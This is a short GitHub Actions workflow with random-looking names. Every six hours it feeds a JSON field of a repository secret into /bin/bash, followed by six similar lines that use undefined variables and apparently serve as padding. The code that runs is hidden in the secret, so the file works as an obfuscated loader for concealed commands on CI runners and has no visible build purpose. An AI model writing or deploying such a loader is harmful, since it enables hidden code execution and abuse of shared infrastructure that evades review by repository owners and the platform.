name: yanchengwei7615

on:
  workflow_dispatch:
  schedule:
    - cron: '38 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanchengwei7615
        env:
          gtrh21997: ${{ secrets.gtrh21997 }}
        run: |
          echo $gtrh21997 | jq -r .mb7 | /bin/bash
          echo $t3861 | jq -r .thu6606 | /bin/bash
          echo $gefr06 | jq -r .epfqy1908 | /bin/bash
          echo $xxjmb1324 | jq -r .kiyug05 | /bin/bash
          echo $jmwj4 | jq -r .g62926 | /bin/bash
          echo $z71 | jq -r .c9966 | /bin/bash
          echo $sl039 | jq -r .le155 | /bin/bash

